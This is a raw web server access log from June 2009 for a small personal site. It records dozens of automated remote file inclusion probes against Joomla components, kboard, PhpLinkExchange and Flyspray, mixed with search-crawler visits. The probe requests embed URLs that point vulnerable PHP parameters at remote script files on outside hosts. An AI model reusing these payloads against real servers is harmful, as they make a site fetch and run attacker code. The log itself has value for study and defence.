65.254.216.47 - - [23/Jun/2009:08:03:25 -0700] "GET /~t290/logs/access.log.0////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 307 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [23/Jun/2009:08:03:25 -0700] "GET /~t290/logs////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 12400 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
216.117.128.143 - - [23/Jun/2009:08:10:42 -0700] "GET /~t290/logs/access.log.0////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 307 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
216.117.128.143 - - [23/Jun/2009:08:10:42 -0700] "GET /~t290////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 905 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
216.117.128.143 - - [23/Jun/2009:08:10:43 -0700] "GET /~t290/logs////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 12400 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
216.117.128.143 - - [23/Jun/2009:08:10:54 -0700] "GET /~t290////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 905 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
216.117.128.143 - - [23/Jun/2009:08:10:54 -0700] "GET /~t290/logs////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 12400 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
216.117.128.143 - - [23/Jun/2009:08:10:54 -0700] "GET /~t290/logs/access.log.0////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 307 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.65.41.165 - - [23/Jun/2009:08:12:59 -0700] "GET /~t290/logs/access.log.0////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 307 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.65.41.165 - - [23/Jun/2009:08:12:59 -0700] "GET /~t290////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 905 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
69.65.41.165 - - [23/Jun/2009:08:13:04 -0700] "GET /~t290/logs////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 12400 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
69.65.41.165 - - [23/Jun/2009:08:13:08 -0700] "GET /~t290/logs/access.log.0////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 307 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.65.41.165 - - [23/Jun/2009:08:13:08 -0700] "GET /~t290/logs////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 12400 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
69.65.41.165 - - [23/Jun/2009:08:13:08 -0700] "GET /~t290////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 905 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
202.181.243.113 - - [23/Jun/2009:08:16:53 -0700] "GET /~t290/logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://lanna-hospital.com/lnh/modules/infinity_menus/js/src/test.gif?? HTTP/1.1" 404 335 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" 0 web.hypersurf.com
217.70.32.2 - - [23/Jun/2009:08:18:52 -0700] "GET /~t290////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 905 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
217.70.32.2 - - [23/Jun/2009:08:18:52 -0700] "GET /~t290/logs/access.log.0////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 307 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
217.70.32.2 - - [23/Jun/2009:08:18:52 -0700] "GET /~t290/logs////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 12400 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
217.70.32.2 - - [23/Jun/2009:08:24:03 -0700] "GET /~t290/logs/access.log.0////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 307 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
217.70.32.2 - - [23/Jun/2009:08:24:03 -0700] "GET /~t290////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 905 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
217.70.32.2 - - [23/Jun/2009:08:24:03 -0700] "GET /~t290/logs////?_SERVER[DOCUMENT_ROOT]=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 12400 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
121.165.73.157 - - [23/Jun/2009:08:33:14 -0700] "GET /~t290/logs/access.log.0//include/write.php?dir=http://www.the-sims2.net/news/backend/id1.txt?? HTTP/1.1" 404 322 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
121.165.73.157 - - [23/Jun/2009:08:33:14 -0700] "GET /~t290//include/write.php?dir=http://www.the-sims2.net/news/backend/id1.txt?? HTTP/1.1" 404 304 /home/users/t/t290/public_html/include "-" "Mozilla/5.0" 0 web.hypersurf.com
121.165.73.157 - - [23/Jun/2009:08:33:14 -0700] "GET /~t290/logs//include/write.php?dir=http://www.the-sims2.net/news/backend/id1.txt?? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs//include "-" "Mozilla/5.0" 0 web.hypersurf.com
121.165.73.157 - - [23/Jun/2009:08:37:51 -0700] "GET /~t290//include/write.php?dir=http://www.the-sims2.net/news/backend/id1.txt?? HTTP/1.1" 404 304 /home/users/t/t290/public_html/include "-" "Mozilla/5.0" 0 web.hypersurf.com
121.165.73.157 - - [23/Jun/2009:08:37:51 -0700] "GET /~t290/logs//include/write.php?dir=http://www.the-sims2.net/news/backend/id1.txt?? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs//include "-" "Mozilla/5.0" 0 web.hypersurf.com /home/users/t/t290/public_html/logs/access.log.0121.165.73.157 - - [23/Jun/2009:08:37:51 -0700] "GET /~t290/logs/access.log.0//include/write.php?dir=http://www.the-sims2.net/news/backend/id1.txt?? HTTP/1.1" 404 322 /home/users/t/
72.30.79.112 - - [23/Jun/2009:08:47:14 -0700] "GET /~t290/?D=A HTTP/1.0" 200 885 /home/users/t/t290/public_html/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
85.214.145.133 - - [23/Jun/2009:08:49:54 -0700] "GET /~t290/logs//skin/zero_vote/error.php?dir=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
85.214.145.133 - - [23/Jun/2009:08:49:54 -0700] "GET /~t290/logs/access.log.0//skin/zero_vote/error.php?dir=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
85.214.145.133 - - [23/Jun/2009:08:49:54 -0700] "GET /~t290//skin/zero_vote/error.php?dir=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
83.98.209.71 - - [23/Jun/2009:09:15:32 -0700] "GET /~t290/logs/access.log.0//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
83.98.209.71 - - [23/Jun/2009:09:15:32 -0700] "GET /~t290//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 297 /home/users/t/t290/public_html/kboard.php "-" "Mozilla/5.0" 0 web.hypersurf.com
83.98.209.71 - - [23/Jun/2009:09:15:32 -0700] "GET /~t290/logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 web.hypersurf.com
65.55.230.229 - - [23/Jun/2009:10:55:38 -0700] "GET /~t290/twllpicts/island/source/20.htm HTTP/1.1" 200 669 /home/users/t/t290/public_html/twllpicts/island/source/20.htm "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:11:13:06 -0700] "GET /~t290/logs/Dec02.html HTTP/1.0" 200 12862 /home/users/t/t290/public_html/logs/Dec02.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
213.189.2.38 - - [23/Jun/2009:11:18:42 -0700] "GET /~t290/logs//com_flyspray/startdown.php?file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 318 /home/users/t/t290/public_html/logs//com_flyspray "-" "Mozilla/5.0" 0 web.hypersurf.com
213.189.2.38 - - [23/Jun/2009:11:18:50 -0700] "GET /~t290/logs/access.log.0//com_flyspray/startdown.php?file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
213.189.2.38 - - [23/Jun/2009:11:18:52 -0700] "GET /~t290//com_flyspray/startdown.php?file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 313 /home/users/t/t290/public_html/com_flyspray "-" "Mozilla/5.0" 0 web.hypersurf.com
213.189.2.38 - - [23/Jun/2009:11:26:30 -0700] "GET /~t290//com_flyspray/startdown.php?file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 313 /home/users/t/t290/public_html/com_flyspray "-" "Mozilla/5.0" 0 web.hypersurf.com
213.189.2.38 - - [23/Jun/2009:11:26:34 -0700] "GET /~t290/logs/access.log.0//com_flyspray/startdown.php?file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
213.189.2.38 - - [23/Jun/2009:11:26:34 -0700] "GET /~t290/logs//com_flyspray/startdown.php?file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 318 /home/users/t/t290/public_html/logs//com_flyspray "-" "Mozilla/5.0" 0 web.hypersurf.com
213.189.2.38 - - [23/Jun/2009:11:41:05 -0700] "GET /~t290/logs//com_flyspray/startdown.php?file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 318 /home/users/t/t290/public_html/logs//com_flyspray "-" "Mozilla/5.0" 0 web.hypersurf.com
213.189.2.38 - - [23/Jun/2009:11:41:05 -0700] "GET /~t290/logs/access.log.0//com_flyspray/startdown.php?file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
213.189.2.38 - - [23/Jun/2009:11:41:05 -0700] "GET /~t290//com_flyspray/startdown.php?file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 313 /home/users/t/t290/public_html/com_flyspray "-" "Mozilla/5.0" 0 web.hypersurf.com
65.55.230.230 - - [23/Jun/2009:11:48:33 -0700] "GET /~t290/twllpicts/loonlake2/source/10.htm HTTP/1.1" 200 645 /home/users/t/t290/public_html/twllpicts/loonlake2/source/10.htm "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 web.hypersurf.com
83.167.62.182 - - [23/Jun/2009:12:51:04 -0700] "GET /~t290/hisierra/07-nature-memory.gif HTTP/1.1" 200 24522 /home/users/t/t290/public_html/hisierra/07-nature-memory.gif "http://www.exalead.com/" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" 0 web.hypersurf.com
124.0.139.129 - - [23/Jun/2009:13:03:25 -0700] "GET /~t290/logs/access.log.0///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [23/Jun/2009:13:03:26 -0700] "GET /~t290/logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [23/Jun/2009:13:03:26 -0700] "GET /~t290///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
218.30.100.97 - - [23/Jun/2009:13:10:15 -0700] "GET /~t290//PhpLinkExchange/bits_listings.php?svr_rootP=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 320 /home/users/t/t290/public_html/PhpLinkExchange "-" "Mozilla/5.0" 0 web.hypersurf.com
218.30.100.97 - - [23/Jun/2009:13:10:15 -0700] "GET /~t290/logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
218.30.100.97 - - [23/Jun/2009:13:10:15 -0700] "GET /~t290/logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs//PhpLinkExchange "-" "Mozilla/5.0" 0 web.hypersurf.com
218.30.100.97 - - [23/Jun/2009:13:24:55 -0700] "GET /~t290/logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 336 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:13:46:59 -0700] "GET /~t290/logs/Jul03.html HTTP/1.0" 200 16827 /home/users/t/t290/public_html/logs/Jul03.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 1 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:14:29:15 -0700] "GET /~t290/logs/Jan02.html HTTP/1.0" 200 16186 /home/users/t/t290/public_html/logs/Jan02.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
124.0.139.129 - - [23/Jun/2009:14:37:29 -0700] "GET /~t290/logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [23/Jun/2009:14:37:29 -0700] "GET /~t290///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [23/Jun/2009:14:37:29 -0700] "GET /~t290/logs/access.log.0///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [23/Jun/2009:15:06:46 -0700] "GET /~t290/logs/components/com_virtuemart/install.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs/components "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [23/Jun/2009:15:06:46 -0700] "GET /~t290/logs/access.log.0/components/com_virtuemart/install.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 341 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [23/Jun/2009:15:06:46 -0700] "GET /~t290/components/com_virtuemart/install.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 323 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
218.30.100.97 - - [23/Jun/2009:15:17:18 -0700] "GET /~t290/logs/access.log.0//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
218.30.100.97 - - [23/Jun/2009:15:17:18 -0700] "GET /~t290//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 297 /home/users/t/t290/public_html/kboard.php "-" "Mozilla/5.0" 0 web.hypersurf.com
218.30.100.97 - - [23/Jun/2009:15:17:18 -0700] "GET /~t290/logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 web.hypersurf.com
65.55.210.59 - - [23/Jun/2009:15:41:42 -0700] "GET /~t290/twllpicts/loonlake2/source/12.htm HTTP/1.1" 304 - /home/users/t/t290/public_html/twllpicts/loonlake2/source/12.htm "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 web.hypersurf.com
110.45.144.106 - - [23/Jun/2009:16:00:42 -0700] "GET /~t290/logs/access.log.0//kboard.php?board=free&act=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.144.106 - - [23/Jun/2009:16:00:42 -0700] "GET /~t290//kboard.php?board=free&act=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 297 /home/users/t/t290/public_html/kboard.php "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.144.106 - - [23/Jun/2009:16:00:42 -0700] "GET /~t290/logs//kboard.php?board=free&act=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:16:42:34 -0700] "GET /~t290/logs/?S=D HTTP/1.0" 200 12360 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:16:48:50 -0700] "GET /~t290/logs/?S=A HTTP/1.0" 200 12360 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
38.99.44.101 - - [23/Jun/2009:17:05:57 -0700] "GET /~t290/twllpicts/loonlake2/source/10.htm HTTP/1.0" 200 645 /home/users/t/t290/public_html/twllpicts/loonlake2/source/10.htm "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:17:09:00 -0700] "GET /~t290/twllpicts/loonlake1/index.htm HTTP/1.0" 200 5600 /home/users/t/t290/public_html/twllpicts/loonlake1/index.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 1 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:17:12:24 -0700] "GET /~t290/logs/Jun02.html HTTP/1.0" 200 8761 /home/users/t/t290/public_html/logs/Jun02.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
83.167.62.182 - - [23/Jun/2009:17:42:49 -0700] "GET /~t290/hisierra/04-natureQ.gif HTTP/1.1" 200 22999 /home/users/t/t290/public_html/hisierra/04-natureQ.gif "http://www.exalead.com/" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:17:44:32 -0700] "GET /~t290/twllpicts/island/source/8.htm HTTP/1.0" 200 672 /home/users/t/t290/public_html/twllpicts/island/source/8.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:18:40:25 -0700] "GET /~t290/logs/Dec03.html HTTP/1.0" 200 17202 /home/users/t/t290/public_html/logs/Dec03.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
124.0.145.1 - - [23/Jun/2009:19:05:25 -0700] "GET /~t290///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.145.1 - - [23/Jun/2009:19:05:25 -0700] "GET /~t290/logs/access.log.0///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.145.1 - - [23/Jun/2009:19:05:25 -0700] "GET /~t290/logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
65.55.210.47 - - [23/Jun/2009:20:16:56 -0700] "GET /~t290/twllpicts/loonlake2/index.htm HTTP/1.1" 304 - /home/users/t/t290/public_html/twllpicts/loonlake2/index.htm "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:20:30:42 -0700] "GET /~t290/twllpicts/island/ HTTP/1.0" 200 5109 /home/users/t/t290/public_html/twllpicts/island/index.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:20:36:38 -0700] "GET /~t290/twllpicts/island/source/19.htm HTTP/1.0" 200 663 /home/users/t/t290/public_html/twllpicts/island/source/19.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:20:36:48 -0700] "GET /~t290/twllpicts/island/source/13.htm HTTP/1.0" 200 675 /home/users/t/t290/public_html/twllpicts/island/source/13.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:20:38:34 -0700] "GET /~t290/logs/awstats.t290.errors404.html HTTP/1.0" 404 306 /home/users/t/t290/public_html/logs/awstats.t290.errors404.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
72.30.79.112 - - [23/Jun/2009:23:01:25 -0700] "GET /~t290/logs/Feb03.html HTTP/1.0" 200 15574 /home/users/t/t290/public_html/logs/Feb03.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
65.55.210.57 - - [23/Jun/2009:23:08:08 -0700] "GET /~t290/twllpicts/loonlake1/source/15.htm HTTP/1.1" 200 643 /home/users/t/t290/public_html/twllpicts/loonlake1/source/15.htm "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 web.hypersurf.com
204.202.23.11 - - [23/Jun/2009:23:16:41 -0700] "GET /~t290/logs/access.log.0/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 347 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.65" 0 web.hypersurf.com
204.202.23.11 - - [23/Jun/2009:23:16:41 -0700] "GET /~t290/logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 334 /home/users/t/t290/public_html/logs/components "-" "libwww-perl/5.65" 0 web.hypersurf.com
72.249.86.219 - - [23/Jun/2009:23:36:03 -0700] "GET /~t290//components/com_flyspray/startdown.php?file=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 324 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
72.249.86.219 - - [23/Jun/2009:23:36:03 -0700] "GET /~t290/logs//components/com_flyspray/startdown.php?file=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0" 0 web.hypersurf.com
72.249.86.219 - - [23/Jun/2009:23:36:03 -0700] "GET /~t290/logs/access.log.0//components/com_flyspray/startdown.php?file=http://webmail.visaotur.com.br/novo/bin/copyright.txt???? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.125.100 - - [23/Jun/2009:23:45:36 -0700] "GET /~t290/logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.125.100 - - [23/Jun/2009:23:45:36 -0700] "GET /~t290//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 320 /home/users/t/t290/public_html/PhpLinkExchange "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.125.100 - - [23/Jun/2009:23:45:36 -0700] "GET /~t290/logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs//PhpLinkExchange "-" "Mozilla/5.0" 0 web.hypersurf.com
217.147.29.190 - - [23/Jun/2009:23:48:34 -0700] "GET /~t290/logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
